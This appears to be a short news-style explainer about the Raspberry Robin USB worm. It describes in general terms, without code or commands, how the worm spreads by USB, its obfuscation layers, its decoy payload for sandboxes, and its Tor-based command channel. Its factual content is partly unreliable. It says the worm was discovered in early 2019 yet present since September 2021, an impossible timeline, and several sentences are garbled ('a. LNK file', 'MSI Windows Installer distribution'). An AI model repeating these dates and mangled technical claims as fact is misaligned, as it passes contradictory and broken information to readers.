In early 2019, researchers from the threat intelligence firm Red Canary discovered an infectious computer worm that had been present in customers’ environments since September 2021. According to a later analysis by Microsoft, this malware, dubbed “Raspberry Robin” by researchers, may date as far back as 2019 and has since integrated with a larger ecosystem of malware. New research by Trend Micro has uncovered an updated version of Raspberry Robin, which began spreading in September through telecommunications and government systems. This new variant attempts to deceive security researchers by hiding its true payload and deploying a dummy payload when it detects active security tools.
Raspberry Robin is classified as a computer worm by cybersecurity analysts due to its self-replicating nature. This worm spreads by copying itself from an infected machine to any attached USB drives, then infecting any future machines that connect to those USB drives. Raspberry Robin may not propagate as rapidly as worms that spread over the Internet or a local area network (LAN), but its spread via USB drives makes it hazardous in other ways. The worm can remain dormant on USB drives for extended periods, then reinfect previously infected computers. USB drive transmission also enables Raspberry Robin to traverse air gaps and infect systems without network access, such as offline archives containing sensitive data. If the worm employs data-destroying malware like ransomware, such an infection could be catastrophic.
Researchers have observed Raspberry Robin deploying a variety of malicious payloads, frequently as part of multi-stage infection chains that can result in ransomware deployment. According to Microsoft, this worm has become one of the largest malware distribution platforms, and threat actors may be paying Raspberry Robin’s developers to install specific payloads on infected machines. Therefore, Raspberry Robin has assumed the role of a malware dropper, infecting computers to install additional malware.
Unfortunately, it can be difficult for security researchers to detect and identify Raspberry Robin, let alone anti-virus software. The infection chain of the worm begins with a. LNK file on a USB flash drive. When the drive is connected to a Windows system and the user double-clicks the shortcut, an executable file is executed that instructs the legitimate msiexec.exe service to download and install a malicious file. MSI Windows Installer distribution. This malicious package contains a significant portion of the Raspberry Robin malware.
However, the malicious code is concealed by more than ten layers of obfuscation. At runtime, each layer of the malware works to sequentially unpack and decrypt the subsequent layer. When this process reaches the payload loader, the loader looks for sandboxing and security analytics tools. If such tools are detected, the loader decompresses and loads a bogus payload intended to deceive security researchers. Before downloading and installing adware, this bogus payload collects and exfiltrates system information. It is possible for security researchers observing this behavior to be misled into believing they have determined the full extent of the malware’s activity.
When the payload loader detects that neither a sandbox nor security analytics tools are active, it unpacks and loads the significantly more malicious real payload. It modifies the Windows registry to elevate its privileges, evades detection, and establish persistence on the compromised system by abusing user admin permissions. The actual payload also contains a Tor client that the malware uses to communicate with command-and-control (C2) servers controlled by the threat actors behind Raspberry Robin. Once threat actors have established a backdoor to an infected system, they can send additional malicious payloads for the malware to install and execute.
This new variant of Raspberry Robin demonstrates how far threat actors will go to create malware that can evade detection by security researchers and anti-virus software. To avoid becoming the next victim of this worm and others like it, users and organizations should always remain vigilant and avoid opening unfamiliar files, even if they appear to be safe upon inspection.